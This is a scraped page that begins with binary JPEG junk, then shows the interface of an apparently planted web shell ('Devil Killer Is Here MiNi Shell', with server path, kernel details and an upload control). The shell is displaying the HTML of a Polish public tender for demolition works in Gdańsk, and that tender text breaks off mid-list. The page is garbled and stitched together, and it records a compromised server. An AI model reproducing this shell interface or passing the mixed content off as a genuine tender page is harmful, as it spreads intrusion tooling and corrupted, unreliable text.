JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220211/0005522701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonywanie robót rozbiórkowych budynków będących własnością Gminy Gdańsk zarządzanych przez Gdańskie Nieruchomości wraz z uporządkowaniem terenu w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gdańskie Nieruchomości</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192817769</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Partyzantów 74</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-254</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(58) 320 10 32, 320 02 20, 302 32 82, 320 12 95</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(58) 345 82 35</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nz@nieruchomoscigda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nieruchomoscigda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie nieruchomościami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie robót rozbiórkowych budynków będących własnością Gminy Gdańsk zarządzanych przez Gdańskie Nieruchomości wraz z uporządkowaniem terenu w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3a36b768-8a4a-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00055227</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3a36b768-8a4a-11ec-9bc1-c2db95d08897 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, w sposób określony w SWZ.<br/>2.Postępowanie prowadzone jest za pośrednictwem platformy e-Zamówienia (zwanej dalej „Platformą”) pod adresem: https://ezamowienia.gov.pl.<br/>3. Do kontaktowania się z wykonawcami upoważniona jest Monika Kąkol, nr tel. 058 302 32 82<br/>4.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za<br/>pomocą poczty elektronicznej na adres e-mail: nz@nieruchomoscigda.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi<br/>posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na<br/>temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl. oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”. 2.Szczegółowy sposób przygotowania oferty<br/>znajduje się na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.3.Wykonawca<br/>przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez<br/>Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w<br/>zakładce „Informacje podstawowe”.4.Zalogowany Wykonawca używając przycisku „Wypełnij”<br/>widocznego pod „Formularzem ofertowym” zobowiązany jest do zweryfikowania poprawności danych<br/>automatycznie pobranych przez system z jego konta i uzupełnienia pozostałych informacji dotyczących<br/>wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia.5. Następnie wykonawca powinien pobrać „Formularz ofertowy”,zapisać go na dysku komputera użytkownika, uzupełnić<br/>pozostałymi danymi wymaganymi przez Zamawiającego i ponownie zapisać na dysku komputera<br/>użytkownika oraz podpisać odpowiednim rodzajem podpisu elektronicznego, zgodnie z pkt 6.Uwaga!<br/>Nie należy zmieniać nazwy pliku nadanej przez Platformę e-Zamówienia. Zapisany „Formularz<br/>ofertowy” należy zawsze otwierać w programie Adobe Acrobat Reader DC.6.Formularz ofertowy<br/>podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym<br/>w formacie PAdES typ wewnętrzny.7.Wykonawca składa ofertę za pośrednictwem zakładki<br/>„Oferty/wnioski”,widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.Po<br/>wybraniu przycisku „Złóż ofertę”system prezentuje okno składania oferty umożliwiające przekazanie<br/>dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop(przeciągnij” i „upuść”)<br/>służące do dodawania plików.8.Wykonawca dodaje wybrany z dysku i uprzednio podpisany „Formularz<br/>oferty”w pierwszym polu („Wypełniony formularz oferty”).W kolejnym polu(„Załączniki i inne dokumenty<br/>przedstawione w ofercie przez Wykonawcę”)wykonawca dodaje pozostałe pliki stanowiące ofertę lub<br/>składane wraz z ofertą.9.Za datę przekazania oferty, oświadczenia,o którym mowa w art. 125 ust.1<br/>p.z.p.,podmiotowych środków dowodowych przyjmuje się datę ich przekazania na Platformie e Zamówienia.10.Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to<br/>250 MB.11.Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf.12.W celu ewentualnej kompresji danych Zamawiający rekomenduje<br/>wykorzystanie jednego z rozszerzeń: .zip, .7Z.13Uwaga! W Rozporządzeniu KRI nie występują: .rar .gif<br/>.bmp .numbers .pages Dokumenty złożone w takich formatach zostaną uznane za złożone<br/>nieskutecznie.14.Sposób sporządzenia i przekazywania informacji oraz wymagania techniczne dla<br/>dokumentów elektronicznych oraz środki komunikacji elektronicznej w postępowaniu o udzielenie<br/>niniejszego zamówienia publicznego musi być zgodny z wymaganiami określonymi w rozporządzeniu<br/>Prezesa Rady Ministrów z dnia z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie(Dz. U.<br/>z 2020 r. poz. 2452)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 - 3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>• administratorem Pani/Pana danych osobowych są Gdańskie Nieruchomości Samorządowy Zakład<br/>Budżetowy, ul. Partyzantów 74, 80-254 Gdańsk,<br/>• inspektorem ochrony danych osobowych w Gdańskich Nieruchomościach SZB jest Pan Krzysztof<br/>Gliński, ul. Partyzantów 74, 80-254 Gdańsk, adres e-mail iodo@nieruchomoscigda.pl, telefon nr606<br/>748 693 ,•Pani/Pana dane osobowe przetwarzane będą, w sposób gwarantujący zabezpieczenie przed<br/>ich<br/>bezprawnym rozpowszechnianiem, na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego na: wykonywanie robót rozbiórkowych budynków będących własnością Gminy Gdańsk zarządzanych przez Gdańskie Nieruchomości wraz z uporządkowaniem terenu w 2022 r. , TZ.250.20.2022.MK prowadzonym w trybie przetargu podstawowym z<br/>możliwością negocjacji,<br/>•odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”,<br/>•Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w<br/>sprawie zamówienia publicznego przekracza 4 lata, zamawiający przechowuje protokół postępowania<br/>wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>•obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp, •w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>•posiada Pani/Pan:<br/>-prawo dostępu do danych osobowych, o których mowa w art. 10 RODO w celu korzystania ze<br/>środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu ich wniesienia,<br/>-na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*,<br/>-na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych**,<br/>-na podstawie art. 18 RODO prawo żądania ograniczenia przetwarzania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO***<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>•nie przysługuje Pani/Panu:<br/>-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>-prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>-na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Wyjaśnienie:<br/>*Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowania żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego.<br/>** skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.<br/>***żądanie ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia danego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TZ.250.20.2022.MK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonywanie robót rozbiórkowych na terenie Obszarów Administracyjnych <br/>nr 1, 2, 3, 4.<br/>a)	budynków wolnostojących lub stykających się z innym obiektem jedną ścianą typu: garaże, pawilony handlowe, komórki lokatorskie, baraki, altanki o konstrukcji ścian mieszanej murowano-drewnianej, drewnianej lub murowanej, konstrukcji dachu drewnianej lub betonowej krytej papą lub blachą wraz z wywozem gruzu i innych odpadów na wysypisko miejskie i ich utylizacją oraz uporządkowaniem terenu o powierzchni do 25 m2 ,<br/>b)	budynków wolnostojących lub stykających się z innym obiektem jedną ścianą typu: garaże, pawilony handlowe, komórki lokatorskie, baraki, altanki o konstrukcji ścian mieszanej murowano-drewnianej, drewnianej lub murowanej, konstrukcji dachu drewnianej lub betonowej krytej papą lub blachą wraz z wywozem gruzu i innych odpadów na wysypisko miejskie i ich utylizacją oraz uporządkowaniem terenu o powierzchni powyżej 25 m2,<br/>c)	budynków wolnostojących lub stykających się z innym obiektem jedną ścianą do 4 kondygnacji, niepodpiwniczonych o konstrukcji ścian murowanej lub mur pruski, konstrukcji stropów drewnianej lub ceramicznej, konstrukcji dachu drewnianej lub betonowej z pokryciem dachu papą lub pokryciem ceramicznym wraz z wywozem gruzu i innych odpadów na wysypisko miejskie i ich utylizacją oraz uporządkowaniem terenu,<br/>d)	budynków wolnostojących lub stykających się z innym obiektem jedną ścianą do 4 kondygnacji, podpiwniczonych o konstrukcji ścian murowanej lub mur pruski, konstrukcji stropów drewnianej lub ceramicznej, konstrukcji dachu drewnianej lub betonowej z pokryciem dachu papą lub pokryciem ceramicznym wraz z wywozem gruzu i innych odpadów na wysypisko miejskie i ich utylizacją oraz uporządkowaniem terenu, zasypaniem piwnic pospółką warstwami co 20-30 cm zagęszczonymi do ID=0,7,<br/>e)	budynków wolnostojących lub stykających się z innym obiektem jedną ścianą powyżej 4 kondygnacji, niepodpiwniczonych o konstrukcji ścian murowanej lub mur pruski, konstrukcji stropów drewnianej lub ceramicznej, konstrukcji dachu drewnianej lub betonowej z pokryciem dachu papą lub pokryciem ceramicznym wraz z wywozem gruzu i innych odpadów na wysypisko miejskie i ich utylizacją oraz uporządkowaniem terenu,<br/>f)	budynków wolnostojących lub stykających się z innym obiektem jedną ścianą powyżej 4 kondygnacji, podpiwniczonych o konstrukcji ścian murowanej lub mur pruski, konstrukcji stropów drewnianej lub ceramicznej, konstrukcji dachu drewnianej lub betonowej z pokryciem dachu papą lub pokryciem ceramicznym wraz z wywozem gruzu i innych odpadów na wysypisko miejskie i ich utylizacją oraz uporządkowaniem terenu, zasypaniem piwnic pospółką warstwami co 20-30 cm zagęszczonymi do ID=0,7,<br/>oraz<br/>g)	likwidacja szamb polegająca na demontażu nakrywy szamb oraz ścian powyżej terenu, dezynfekcji przy użyciu wapna, zasypaniem piaskiem z zagęszczeniem do ID=0,7 oraz wywozem gruzu na wysypisko wraz z utylizacją,<br/>h)	wywóz śmieci i odpadów po wyprowadzce lokatorów oraz odpadów wielkogabarytowych (meble, sprzęt gospodarstwa domowego, butelki, puszki, materace itp.) nie obejmujących gruzu oraz innych odpadów powstających w wyniku rozbiórek,<br/>i)	wykonanie kompletu dokumentacji geodezyjno-kartograficznej zawierającej dane umożliwiające wprowadzenie zmian na mapę zasadniczą do ewidencji budynków oraz do ewidencji sieci uzbrojenia terenu wykonana zgodnie z Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie ( Dz. U. Nr 25 poz. 133).<br/>2.	Zakres robót obejmuje:<br/>a)	rozbiórkę konstrukcji drewnianej lub betonowej dachu,<br/>b)	rozbiórkę pokrycia dachów z papy lub ceramicznych,<br/>c)	rozbiórkę konstrukcji murowanej budynku,<br/>d)	rozbiórkę konstrukcji drewnianej budynku,<br/>e)	rozbiórkę ścian z cegły i drewna,<br/>f)	rozbiórkę stropów,<br/>g)	rozbiórkę podłóg i posadzek,<br/>h)	rozbiórkę kominów,<br/>i)	rozbiórkę ścian piwnicznych<br/>j)	rozbiórkę fundamentów i ław fundamentowych,<br/>k)	rozbiórkę komórek drewnianych i murowanych, <br/>l)	rozbiórkę ścian żelbetowych, <br/>m)	likwidację szamb polegająca na demontażu nakrywy szamb oraz ścian powyżej terenu, dezynfekcji przy użyciu wapna,<br/>n)	zasypanie wykopów pospółką i zagęszczenie, <br/>o)	wywóz gruzu i innych odpadów np. papa, śmieci, w tym znajdujących się w rozbieranych obiektach,<br/>p)	uporządkowanie terenu po rozbiórce,<br/>q)	wykonanie kompletu dokumentacji geodezyjno-kartograficznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111213-4 - Roboty w zakresie oczyszczania terenu</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">cena – wartość wywozu śmieci i odpadów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">cena – wartość kompletu dokumentacji geodezyjnej powykonawczej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">średni czas realizacji rozbiórki od wprowadzenia na budowy w dniach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:1. zdolności technicznej, jeżeli dysponują co najmniej: a) 1 pojazdem samowyładowczym kategorii N2 - pojazdy do przewozu ładunków i mające maksymalną masę<br/>całkowitą przekraczającą 3,5 t, ale nieprzekraczającą 12 t, b) 2 